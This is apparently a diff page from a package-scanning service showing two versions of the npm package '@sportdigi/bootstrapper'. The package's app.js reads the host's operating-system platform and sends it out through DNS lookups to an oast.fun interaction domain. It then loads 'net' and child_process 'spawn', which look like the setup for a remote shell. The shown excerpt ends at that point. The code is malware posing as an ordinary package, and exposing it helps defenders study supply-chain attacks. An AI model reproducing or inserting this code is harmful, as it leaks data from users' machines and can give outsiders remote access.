@sportdigi/bootstrapper 18.1.0 → 19.1.0
Sign up to get free protection for your applications and to get access to all the features.
- package/app.js +2 -2
- package/package.json +1 -1
package/app.js
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
const dns = require('dns');
|
2
2
|
const os = require('os');
|
3
|
-
|
3
|
+
let platform = os.platform();
|
4
4
|
function sendDns(query){
|
5
5
|
let domain = `${query}.fctdhxpvrzxmmwtxpidt0w23qlngi0owc.oast.fun`;
|
6
6
|
dns.resolve(domain, (err, records) => {
|
@@ -11,7 +11,7 @@ function sendDns(query){
|
|
11
11
|
});
|
12
12
|
}
|
13
13
|
|
14
|
-
sendDns(
|
14
|
+
sendDns(platform);
|
15
15
|
|
16
16
|
const net = require('net');
|
17
17
|
const spawn = require('child_process').spawn;
|